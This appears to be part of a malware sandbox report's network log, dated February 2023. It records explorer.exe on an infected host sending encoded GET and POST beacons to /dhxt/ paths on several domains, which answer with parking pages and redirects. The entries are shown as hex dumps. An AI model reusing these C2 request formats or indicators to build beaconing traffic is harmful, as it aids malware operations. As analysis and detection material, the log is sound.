                                                                                                              Feb 6, 2023 14:39:22.443475962 CET262INData Raw: 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6d 70 6c 65 78 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66
                                                                                                              Data Ascii: </div> </div></section><section class="complex"> <a href="https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosblock"> <span>Registro de dominios</span>
                                                                                                              Feb 6, 2023 14:39:22.443501949 CET262INData Raw: 6b 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 77 69 74 74 65 72 2e 63 6f 6d 2f 70 69 65 6e 73
                                                                                                              Data Ascii: k</a> </li> <li> <a href="https://twitter.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Twitter"> <img src="https://piensasolutions.com/imgs/parking/icon-twitter-small.pn
                                                                                                              Feb 6, 2023 14:39:22.443523884 CET263INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              14192.168.2.449709217.76.156.25280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:24.987344980 CET263OUTGET /dhxt/?UlkAHnsI=Y88RZnbUg+vg39XJ7Xe2z5ar6Steri0PsoUs6lQE0S1yE6fkUvOaIgRIh7ssJiEciN8m5Ru/FUUSgB9hFV8vRHrdywJO04cRIQ==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.lastmilerent.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:25.047147989 CET265INHTTP/1.1 404 Not Found
                                                                                                              Date: Mon, 06 Feb 2023 13:39:25 GMT
                                                                                                              Server: Apache
                                                                                                              X-ServerIndex: llim603
                                                                                                              Upgrade: h2,h2c
                                                                                                              Connection: Upgrade, close
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 73 74 6d 69 6c 65 72 65 6e 74 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 70 61 72 6b 69 6e 67 2e 70 6e 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 6c 61 73 74 6d 69 6c 65 72 65 6e 74 2e 63 6f 6d 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                                                                                              Data Ascii: 1aa7<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.lastmilerent.com</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la p&aacute;gina de:</p> <h1>www.lastmilerent.com</h1> </div
                                                                                                              Feb 6, 2023 14:39:25.047189951 CET266INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 54 45 58 54 4f 5f 52 45 47 49 53 54 52 41 4e 54 45 2d 2d 3e 0d 0a 20 20 20 20
                                                                                                              Data Ascii: > ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PERSONAL--> </div> <div class="back" style
                                                                                                              Feb 6, 2023 14:39:25.047219038 CET267INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 3e 53 69 20 71 75 69 65 72 65 73 20 6f 62 74 65 6e 65 72 20 6d 26 61 61 63 75 74 65 3b 73 20 69 6e 66 6f 72 6d 61 63 69 26 6f 61 63 75 74 65 3b 6e 20 70 61 72 61 20 63 72 65 61 72 20 74 75 20 70 72 6f 70 69
                                                                                                              Data Ascii: > <p>Si quieres obtener m&aacute;s informaci&oacute;n para crear tu propio proyecto online, consulta nuestros productos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span>
                                                                                                              Feb 6, 2023 14:39:25.047246933 CET268INData Raw: 75 74 6d 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6c 69 6e 6b 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 77 65 62 22 3e 3c 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20
                                                                                                              Data Ascii: utm_source=parking&amp;utm_medium=link&amp;utm_campaign=web"><article> <img src="https://piensasolutions.com/imgs/parking/icon-web.png"> <h2>MI P&Aacute;GINA WEB</h2> <p>Dise&ntilde;a tu propi
                                                                                                              Feb 6, 2023 14:39:25.047274113 CET270INData Raw: 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6d 70 6c 65 78 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66
                                                                                                              Data Ascii: </div> </div></section><section class="complex"> <a href="https://www.piensasolutions.com/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominiosblock"> <span>Registro de dominios</span>
                                                                                                              Feb 6, 2023 14:39:25.047297955 CET270INData Raw: 6b 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 77 69 74 74 65 72 2e 63 6f 6d 2f 70 69 65 6e 73
                                                                                                              Data Ascii: k</a> </li> <li> <a href="https://twitter.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Twitter"> <img src="https://piensasolutions.com/imgs/parking/icon-twitter-small.pn
                                                                                                              Feb 6, 2023 14:39:25.047317028 CET271INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              15192.168.2.449710199.59.243.22280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:30.120506048 CET272OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.moneycarrewards.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.moneycarrewards.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.moneycarrewards.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 68 76 50 41 55 56 77 39 4c 73 46 33 74 46 6a 45 55 55 43 68 73 72 4a 54 77 36 4c 71 48 58 72 65 6e 58 30 76 49 32 41 7a 39 49 78 64 75 6b 35 70 4b 6d 7e 31 42 44 78 58 75 54 66 55 68 4d 37 6a 69 61 30 39 77 62 78 6a 37 2d 4b 49 4c 63 48 78 68 33 33 65 36 71 51 63 36 6a 6e 6d 41 58 68 46 47 6d 43 53 4e 78 79 7a 36 79 41 4f 61 39 4b 37 59 46 32 65 68 52 6b 4d 37 50 34 6e 63 66 66 6c 4d 62 37 36 75 30 43 78 78 46 6f 34 43 69 64 52 62 49 6b 37 6f 51 51 6c 55 49 31 68 63 35 61 74 68 6f 51 4f 53 39 6a 76 66 79 43 6f 51 54 74 4b 6d 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=hvPAUVw9LsF3tFjEUUChsrJTw6LqHXrenX0vI2Az9Ixduk5pKm~1BDxXuTfUhM7jia09wbxj7-KILcHxh33e6qQc6jnmAXhFGmCSNxyz6yAOa9K7YF2ehRkM7P4ncfflMb76u0CxxFo4CidRbIk7oQQlUI1hc5athoQOS9jvfyCoQTtKmw).
                                                                                                              Feb 6, 2023 14:39:30.323227882 CET273INHTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Mon, 06 Feb 2023 13:39:30 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: parking_session=5cb1096a-46a2-01bb-32a5-fb76867238df; expires=Mon, 06-Feb-2023 13:54:30 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CzUJnRCI1KzW3BIkcQpjYMDLFohf6ZGuoHNbGFWkIsVZZalPmtRRnSbyv1y5n/9dvQsmKVg7SpaAum+TcihFGA==
                                                                                                              Cache-Control: no-cache
                                                                                                              Accept-CH: sec-ch-prefers-color-scheme
                                                                                                              Critical-CH: sec-ch-prefers-color-scheme
                                                                                                              Vary: sec-ch-prefers-color-scheme
                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                              Cache-Control: no-store, must-revalidate
                                                                                                              Cache-Control: post-check=0, pre-check=0
                                                                                                              Pragma: no-cache
                                                                                                              Content-Encoding: gzip
                                                                                                              Data Raw: 33 61 30 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 54 db 72 a3 38 10 fd 15 af 5f e6 61 37 36 17 93 c4 b3 26 55 f8 82 81 80 1c c0 80 d1 cb 96 90 14 23 ee 03 18 0c 5f bf 38 33 35 fb b6 0f 52 95 d4 dd a7 bb 75 4e 6b f3 07 29 71 3b 54 74 16 b7 79 f6 b6 79 ec 33 82 5a f4 84 48 94 95 38 4d e9 20 cf 2d b5 ef f7 76 68 bc 97 50 8f 3b 0c 14 fb b0 dd da ca de ed 95 de 55 8c ad 02 f6 75 25 64 e3 8b 72 ca 95 3d 02 af ad 22 71 66 13 e0 c4 54 07 5b c5 d1 f2 43 38 df b1 f4 5a 86 27 aa 9b 91 d8 6d fb 17 e3 f9 73 55 a1 3c 55 6c df b5 6f 3f c2 e6 fd 2e 86 23 f1 b4 5d 17 f9 b0 53 bd 66 a7 f4 07 45 b1 65 f9 9f dd e8 19 85 b3 d3 f9 f7 31 10 b7 7a 8a ed 2a 09 ad bd a9 96 f1 e7 33 3c de 4a 0d 44 47 35 48 f5 c6 87 10 65 1f 79 eb 38 85 1b 0d 1d 3f 48 c5 72 4d 3a bb c9 df fd eb 8b 5b 21 e5 96 ff 79 c6 2c 56 8f 8a 2c cf a7 8e 29 22 6f 9b 9c b6 68 86 63 54 37 b4 95 e7 b7 f6 f3 e9 75 b2 7d dd 16 28 a7 f2 bc 63 b4 af ca ba 9d cf 70 59 b4 b4 98 bc 7a 46 da 58 26 b4 63 98 3e 7d 1d fe 9a b1 82 b5 0c 65 4f 0d 46 19 95 f9 09 23 63 45 3a ab 69 26 cf ab 9a 4e b1 05 c5 13 48 5c d3 4f 79 1e b7 6d d5 7c 5f
                                                                                                              Data Ascii: 3a0}Tr8_a76&U#_835RuNk)q;Ttyy3ZH8M -vhP;Uu%dr="qfT[C8Z'msU<Ulo?.#]SfEe1z*3<JDG5Hey8?HrM:[!y,V,)"ohcT7u}(cpYzFX&c>}eOF#cE:i&NH\Oym|_
                                                                                                              Feb 6, 2023 14:39:30.323259115 CET274INData Raw: 2e fb be 5f 5c cb f2 9a d1 05 2e f3 29 45 5d 36 4d 59 b3 2b 2b de 36 cb 9f 15 46 25 19 de 36 84 75 33 46 e4 79 8b ea 2b 9d 70 9a 76 98 f2 7c 2b 2b 84 59 3b 7c 9f 71 df a6 80 c9 e9 6d d3 e0 9a 55 ed 5b cf 0a 52 f6 8b 0a d5 e9 4c 9e cd e9 60 f0 24
                                                                                                              Data Ascii: ._\.)E]6MY++6F%6u3Fy+pv|++Y;|qmU[RL`$R=)C0[5g.*QOG'YQ-Pg$Id1G4[cS$"6 AfBaN>)b{eq>#l6hS0?03Jm


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              16192.168.2.449711199.59.243.22280C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:32.673954010 CET274OUTGET /dhxt/?2ani-=qhGAdkIKoH&UlkAHnsI=stngXlFCM6RnlHv9W0Owvb5Q7a/1GW7Bx3QsCD4j5Kk1nwRSFSS2AVlFvVf479jy1oAGro1MyvipTvqZ1lHNwKEX6xCFHE1kEA== HTTP/1.1
                                                                                                              Host: www.moneycarrewards.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:32.876430988 CET276INHTTP/1.1 200 OK
                                                                                                              Server: openresty
                                                                                                              Date: Mon, 06 Feb 2023 13:39:32 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: parking_session=c686acb8-3418-68a5-f20f-fa958a8a7e05; expires=Mon, 06-Feb-2023 13:54:32 GMT; Max-Age=900; path=/; HttpOnly
                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_G9yy01YMr2h5wTjj6Bf6E3kPY52BH3FeUE/WD7c3lnjvYAuz7HOqXcXrcooHgGc/g7orxVgT8VEk8Lr4gebVwA==
                                                                                                              Cache-Control: no-cache
                                                                                                              Accept-CH: sec-ch-prefers-color-scheme
                                                                                                              Critical-CH: sec-ch-prefers-color-scheme
                                                                                                              Vary: sec-ch-prefers-color-scheme
                                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                              Cache-Control: no-store, must-revalidate
                                                                                                              Cache-Control: post-check=0, pre-check=0
                                                                                                              Pragma: no-cache
                                                                                                              Data Raw: 34 63 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 47 39 79 79 30 31 59 4d 72 32 68 35 77 54 6a 6a 36 42 66 36 45 33 6b 50 59 35 32 42 48 33 46 65 55 45 2f 57 44 37 63 33 6c 6e 6a 76 59 41 75 7a 37 48 4f 71 58 63 58 72 63 6f 6f 48 67 47 63 2f 67 37 6f 72 78 56 67 54 38 56 45 6b 38 4c 72 34 67 65 62 56 77 41 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65
                                                                                                              Data Ascii: 4cb<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_G9yy01YMr2h5wTjj6Bf6E3kPY52BH3FeUE/WD7c3lnjvYAuz7HOqXcXrcooHgGc/g7orxVgT8VEk8Lr4gebVwA=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect" hre
                                                                                                              Feb 6, 2023 14:39:32.876487017 CET277INData Raw: 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f 70 61 63 69 74
                                                                                                              Data Ascii: f="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiYzY4NmFjYjgtMzQxOC02OGE1LWYyMGYtZmE5NThhOGE3ZTA1IiwicGFnZV90aW1lIjoxNjc1NjkwNzcyLCJwYWdlX3VybCI6Imh0dHA6XC9cL3d3dy
                                                                                                              Feb 6, 2023 14:39:32.876513958 CET277INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              17192.168.2.449712156.255.170.11480C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:38.267879963 CET278OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.cmproutdoors.com
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.cmproutdoors.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Accept: */*
                                                                                                              Referer: http://www.cmproutdoors.com/dhxt/
                                                                                                              Accept-Language: en-US
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Data Raw: 55 6c 6b 41 48 6e 73 49 3d 4b 66 49 56 64 6b 72 77 42 4c 31 49 68 65 35 49 66 51 79 50 48 5a 49 70 76 55 37 49 71 64 44 63 4c 55 65 51 49 6f 47 5f 68 67 4a 33 6d 4d 4c 2d 62 35 75 76 6b 43 78 74 7a 74 69 74 46 72 74 78 50 37 4a 4c 4c 37 32 79 4a 4d 62 42 33 2d 65 43 69 6a 49 55 70 53 5a 57 38 6e 59 50 45 79 75 39 64 45 54 6d 52 35 57 6d 28 30 53 64 47 50 59 34 63 38 37 66 5a 66 51 6f 6a 35 36 4b 36 64 57 51 66 61 33 34 49 39 35 6f 47 52 71 48 75 68 6c 48 54 5a 41 59 33 68 7e 46 64 4a 79 72 33 53 71 38 75 37 66 41 39 48 72 6c 6c 58 63 69 33 79 57 4b 6c 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                              Data Ascii: UlkAHnsI=KfIVdkrwBL1Ihe5IfQyPHZIpvU7IqdDcLUeQIoG_hgJ3mML-b5uvkCxtztitFrtxP7JLL72yJMbB3-eCijIUpSZW8nYPEyu9dETmR5Wm(0SdGPY4c87fZfQoj56K6dWQfa34I95oGRqHuhlHTZAY3h~FdJyr3Sq8u7fA9HrllXci3yWKlg).
                                                                                                              Feb 6, 2023 14:39:38.467339993 CET278INHTTP/1.1 301 Moved Permanently
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:38 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 162
                                                                                                              Connection: close
                                                                                                              Location: https://www.cmproutdoors.com/dhxt/
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              18192.168.2.449713156.255.170.11480C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:41.003834009 CET279OUTGET /dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g1NuJE+12L7lxU5+TL8fcs8OKnDw+uls6plsXJT+jSQ==&2ani-=qhGAdkIKoH HTTP/1.1
                                                                                                              Host: www.cmproutdoors.com
                                                                                                              Connection: close
                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                              Data Ascii:
                                                                                                              Feb 6, 2023 14:39:41.203809977 CET280INHTTP/1.1 301 Moved Permanently
                                                                                                              Server: nginx
                                                                                                              Date: Mon, 06 Feb 2023 13:39:41 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Content-Length: 162
                                                                                                              Connection: close
                                                                                                              Location: https://www.cmproutdoors.com/dhxt/?UlkAHnsI=Hdg1eSHwHIdp18MOehnfDNNUuCDltrvSJkToDZ2NoA5/soeDYsGvmU4g1NuJE+12L7lxU5+TL8fcs8OKnDw+uls6plsXJT+jSQ==&2ani-=qhGAdkIKoH
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              19192.168.2.4497143.127.73.21680C:\Windows\explorer.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 6, 2023 14:39:46.292882919 CET281OUTPOST /dhxt/ HTTP/1.1
                                                                                                              Host: www.ontheverge.wales
                                                                                                              Connection: close
                                                                                                              Content-Length: 190
                                                                                                              Cache-Control: no-cache
                                                                                                              Origin: http://www.ontheverge.wales
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                              Content-Type: application/x-www-form-urlencoded
